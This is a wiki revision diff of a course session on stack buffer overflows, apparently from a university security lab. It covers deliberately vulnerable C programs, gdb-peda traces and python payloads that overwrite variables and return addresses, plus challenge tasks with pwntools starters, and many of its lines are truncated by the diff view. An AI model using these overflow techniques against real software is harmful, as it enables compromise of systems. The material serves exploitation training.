This shows you the differences between two versions of the page.
Both sides previous revision Previous revision Next revision | Previous revision | ||
session:06 [2018/06/28 17:01] Maria-Elena MIHĂILESCU (25616) [Stack buffer overflows] Add code snippets link |
session:06 [2020/07/19 12:49] (current) |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | = 0x06. Buffer | + | ====== 0x05. Buffer |
- | == Slides | + | ===== Resources ===== |
- | Slides are available | + | [[https:// |
- | [[https:// | + | [[https:// |
[[https:// | [[https:// | ||
- | == Tutorials | ||
- | == Buffers | + | / |
+ | |||
+ | ===== Tutorials ===== | ||
+ | |||
+ | ===== Buffers | ||
A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. | A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes. | ||
Line 215: | Line 218: | ||
Can you guess how the resulting code will look like, disassembled? | Can you guess how the resulting code will look like, disassembled? | ||
- | === Stack buffer overflows | + | ==== Stack buffer overflows |
As we have seen in previous sessions, the stack serves multiple purposes: | As we have seen in previous sessions, the stack serves multiple purposes: | ||
Line 405: | Line 408: | ||
</ | </ | ||
- | === Diverting code execution | + | ==== Diverting code execution |
We attempted to use the wonderful '' | We attempted to use the wonderful '' | ||
Line 419: | Line 422: | ||
However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability. | However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability. | ||
- | <code c> | + | You can find the following code snippet [[https:// |
+ | |||
+ | < | ||
#include < | #include < | ||
#include < | #include < | ||
Line 446: | Line 451: | ||
<code bash> | <code bash> | ||
- | $ python -c "print ' | + | $ python -c "print ' |
</ | </ | ||
- | Nothing happened. Let's find out why. We'll save our payload to a file and run '' | + | Nothing happened. Let's find out why. We'll save our payload to a file and run '' |
<code bash> | <code bash> | ||
$ python -c "print ' | $ python -c "print ' | ||
- | $ gdb ./divert | + | $ gdb ./buffer_overflow_var |
gdb-peda$ b *0x80484fc | gdb-peda$ b *0x80484fc | ||
Breakpoint 1 at 0x80484fc | Breakpoint 1 at 0x80484fc | ||
gdb-peda$ r < payload | gdb-peda$ r < payload | ||
- | Starting program: ./divert | + | Starting program: ./buffer_overflow_var |
[----------------------------------registers-----------------------------------] | [----------------------------------registers-----------------------------------] | ||
Line 527: | Line 532: | ||
< | < | ||
- | $ cat payload | ./divert | + | $ cat payload | ./buffer_overflow_var |
Oh dear, you shouldn' | Oh dear, you shouldn' | ||
</ | </ | ||
Line 534: | Line 539: | ||
< | < | ||
- | $ cat payload - | ./divert | + | $ cat payload - | ./buffer_overflow_var |
Oh dear, you shouldn' | Oh dear, you shouldn' | ||
date | date | ||
Line 546: | Line 551: | ||
</ | </ | ||
- | === Overwriting the stored return address | + | ==== Overwriting the stored return address |
Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack. | Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack. | ||
- | <code c> | + | You can find the following code snippet [[https:// |
+ | |||
+ | < | ||
#include < | #include < | ||
Line 584: | Line 591: | ||
<code bash> | <code bash> | ||
- | $ ./overret | + | $ ./buffer_overflow_ret |
Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | Please leave a message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | ||
Nothing to see here | Nothing to see here | ||
Line 593: | Line 600: | ||
<code bash> | <code bash> | ||
- | $ gdb ./overret | + | $ gdb ./buffer_overflow_ret |
gdb-peda$ pattc 100 | gdb-peda$ pattc 100 | ||
' | ' | ||
gdb-peda$ r | gdb-peda$ r | ||
- | Starting program: /tasks/ | + | Starting program: |
Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA; | Please leave a message: AAA%AAsAABAA$AAnAACAA-AA(AADAA; | ||
Nothing to see here | Nothing to see here | ||
Line 648: | Line 655: | ||
<code bash> | <code bash> | ||
gdb-peda$ r < payload | gdb-peda$ r < payload | ||
- | Starting program: /tasks/ | + | Starting program: |
Please leave a message: Nothing to see here | Please leave a message: Nothing to see here | ||
Line 668: | Line 675: | ||
[------------------------------------stack-------------------------------------] | [------------------------------------stack-------------------------------------] | ||
0000| 0xffffd620 --> 0x0 | 0000| 0xffffd620 --> 0x0 | ||
- | 0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("/tasks/ | + | 0004| 0xffffd624 --> 0xffffd6b4 --> 0xffffd859 ("./buffer_overflow_ret") |
0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb (" | 0008| 0xffffd628 --> 0xffffd6bc --> 0xffffd8cb (" | ||
0012| 0xffffd62c --> 0xffffd644 --> 0x0 | 0012| 0xffffd62c --> 0xffffd644 --> 0x0 | ||
Line 690: | Line 697: | ||
< | < | ||
- | $ cat payload | ./overret | + | $ cat payload | ./buffer_overflow_ret |
Please leave a message: Nothing to see here | Please leave a message: Nothing to see here | ||
Well done! | Well done! | ||
Line 702: | Line 709: | ||
</ | </ | ||
- | == Challenges | + | ===== Challenges |
<note important> | <note important> | ||
Line 721: | Line 728: | ||
Use the following [[http:// | Use the following [[http:// | ||
- | === 01. Parrot | + | ==== 01. Parrot |
Some programs feature a "stack smashing protection" | Some programs feature a "stack smashing protection" | ||
Line 727: | Line 734: | ||
We have implemented our very own '' | We have implemented our very own '' | ||
- | === 02. Indexing | + | <note tip> |
+ | Values are little endian. So if you want to send '' | ||
+ | </ | ||
+ | |||
+ | <note tip> | ||
+ | When providing input to a program and wanting to maintain connection to its standard input, run: | ||
+ | < | ||
+ | cat payload - | ./program | ||
+ | </ | ||
+ | |||
+ | Or, if you have a payload generator program such as '' | ||
+ | < | ||
+ | cat <(python payload.py) - | ./program | ||
+ | </ | ||
+ | </ | ||
+ | |||
+ | ==== 02. Indexing | ||
More complex programs require some form of protocol or user interaction. This is where the great [[https:// | More complex programs require some form of protocol or user interaction. This is where the great [[https:// | ||
Line 733: | Line 756: | ||
Here's an interactive script to get you started: | Here's an interactive script to get you started: | ||
- | <code python> | + | <code python |
# | # | ||
from pwn import * | from pwn import * | ||
Line 748: | Line 771: | ||
</ | </ | ||
- | === 03. Smashthestack Level7 | + | <note tip> |
+ | Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB. | ||
+ | </ | ||
+ | |||
+ | <note tip> | ||
+ | You can inspect the behavior of a program for a given input by doing: | ||
+ | < | ||
+ | cat payload | strace ./program | ||
+ | </ | ||
+ | That is, you will trace the program being exploited and see '' | ||
+ | </ | ||
+ | ==== 03. Smashthestack Level7 | ||
Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one. | Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one. | ||
- | === 04. Neighbourly | + | <note tip> |
+ | There' | ||
+ | </ | ||
- | Let's overwrite a structure' | + | <note tip> |
+ | What are the four 32 bit values that multiplied by '' | ||
+ | </ | ||
- | === 05. Bonus: Birds | + | <note tip> |
+ | In order to run a program that receives command line arguments under gdb, you can do the following: | ||
- | Time for a more complex challenge. Be patient and don't speed through | + | <code gdb> |
+ | $ gdb ./main | ||
+ | gdb$ set args arg1 arg2 arg3 | ||
+ | gdb$ start | ||
+ | </ | ||
+ | </ | ||
+ | ==== 04. Neighbourly ==== | ||
+ | |||
+ | Let's overwrite | ||
+ | |||
+ | <note tip> | ||
+ | The '' | ||
+ | </ | ||
- | === 06. Uninitialized | + | ==== 05. Uninitialized |
There' | There' | ||
Line 767: | Line 818: | ||
Do **not** use pwntools for this task. | Do **not** use pwntools for this task. | ||
</ | </ | ||
- | === 07: Bonus: Uninitialized 2 | + | ==== 06: Bonus: Uninitialized 2 ==== |
There' | There' | ||
<note tip> | <note tip> | ||
- | Use '' | + | Use '' |
</ | </ | ||
Line 778: | Line 829: | ||
Create a pwntools-based script to solve both the initial executable and the bonus one. | Create a pwntools-based script to solve both the initial executable and the bonus one. | ||
</ | </ | ||
+ | |||
+ | ==== 05. Bonus: Birds ==== | ||
+ | |||
+ | Time for a more complex challenge. Be patient and don't speed through it. |